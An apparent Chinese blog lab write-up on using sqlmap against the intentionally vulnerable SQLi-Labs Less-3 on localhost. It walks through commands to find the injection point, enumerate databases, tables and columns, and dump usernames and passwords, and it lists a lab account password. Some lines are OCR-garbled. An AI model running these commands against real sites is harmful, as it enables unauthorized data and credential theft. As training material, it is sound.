实验目的
了解SQLMAP的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-u参数的基本使用方法。
实验环境
攻击机:吹毁目标
(2)安装的应用软件:sqlmap 、Burpsuite 、FireFox浏览器及其插件Hackbar、 等
(3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890
靶机:司马华腾
(1)操作系统:本机(建议用虚拟机)不过我太懒了[]~( ̄▽ ̄)~*
(2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、
SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。
SQLMAP的基本功能包括:判断可注入的参数、判断可以使用哪一种SQL注入技术进行注入、判断识别数据库的类型以及根据用户的选择从数据库中读取数据。
SQLMAP支持的注入技术包括以下五种:
(1)基于布尔的盲注:根据返回页面判断条件真假的注入。
(2)基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看
时间延迟语句是否执行(即页面返回时间是否增加)来判断。
(3)基于报错的注入:页面会返回错误信息,或者把注入的语句的结果直接返
回在页面中。
(4)基于联合查询的注入:可以使用UNION的情况下的注入。
(5)堆查询注入:同时执行多条语句的注入。
SOLMAP支持的数据库类型主要包括一些关系型数据库(RMDBS),如
MySQL、Oracle、 PostgresQL、Microsoft SQL Server、 Microsoft Access、IBM
DB2、SQLite、Firebird、Sybase、SAPMaxDB、Informix、HSQLDB等。
实验步骤
本实验的目标是:以SQLi-Labs网站的Less-3为入口,利用SQLMAP实施自
动化SQL注入,获取SQLi-Labs网站的登录用户名和密码。
1.访间SQLi-Labs网站
在攻击机Pentest-Atk打开FireFox浏览器,并访问粑机A-SQLi-Labs上的
SQLi-Labs网站Less-3。访间的URL为:
http://[机IP]/sqli-1abs/less-3/
登录后,根据网页提示,先给定一个GET参数,即;
http://127.0.0.1/sqli-labs-master/Less-3/?id=1
此时页面显示id=1的用户名Dump、密码Dump。
2.启动SQLMAP
启动Windows操作系统的命令行工具cmd:键入SQLmap路径
反之于目录直接cmd亦可
SQLmap的下载和安装使用教程_Gjqhs的博客-CSDN博客
使用以下命令启动SQLMAP帮助:
python sqlmap.py -h
3.寻找注入点
使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息:
pythonsqimappyu“http://靶机IP]/sqli-1abs/less-3/id=1”
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1
(可根据实际需要) 选择y /n
检测结果
4.获取所有数据库的库名
(1)使用以下命令获取所有数据库的库名:
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --dbs
所有库名
(2)使用以下命令获取网站当前所在数据库的库名:
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --current-db
获取成功
检测结果:网站当前所在数据库的库名为security。
5.获取security数据库中所有的表名
使用以下命令获取security数据库中所有的表名:
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security --tables
检测结果:security数据库中含有emails、referers、uagents、users四张表。
其中,有一个名为users的表,这当中往往存放着网站用户的基本信息。
6.获取users表的全部字段名
使用以下命令获取users表的全部字段名
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users --columns
检测结果:users表中有三个字段id、username和password。
7.获取users表id、username和password字段的全部值
使用以下命令获取users表id、username和password字段的全部值
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users -C id,username,password --dump
检测结果如下图所示:
实验结束,你学废了吗
这不趁热再来几个
SQL注入 ——sql数据库操作基础(一)_Gjqhs的博客-CSDN博客
SQL注入-宽字节注入(十一)(面试热点)_Gjqhs的博客-CSDN博客
...
更多包括而不限于SQL注入的文章,关注我全部带走吧( •̀ ω •́ )✧